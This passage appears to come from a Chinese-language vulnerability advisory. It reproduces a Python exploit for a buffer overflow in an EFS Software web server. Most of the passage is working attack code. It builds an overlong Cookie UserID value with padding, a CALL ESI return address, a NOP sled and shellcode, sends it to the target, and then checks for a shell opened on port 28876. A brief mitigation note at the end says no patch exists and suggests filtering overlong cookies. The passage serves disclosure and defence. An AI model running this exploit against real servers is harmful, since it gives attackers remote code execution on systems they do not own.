payload += "C"*108 # padding
payload += struct.pack("<I", 0x10023701) # pointer to CALL ESI
payload += "\x90"*20 # NOP sled
payload += shellcode # calc.exe
# craft the request
buf = (
"GET /vfolder.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + target + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: " + target + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
# send the request and payload to the server
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((target, port))
s1.send(buf)
s1.close()
try:
# check if we guessed the correct address by connecting to port 28876
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((target, 28876))
s2.close()
print "\n[+] Success! A shell is waiting on port 28876!"
break
except Exception,e:
pass
建议:
--------------------------------------------------------------------------------
厂商补丁:
EFS Software
------------
目前厂商还没有提供补丁或者升级程序。在补丁发布之前,建议仅允许受信任的网络访问该 Web 服务,并在前置代理或 WAF 上拒绝 Cookie 中 UserID 字段超长的请求(上面的请求正是通过该字段提交超长数据)。我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: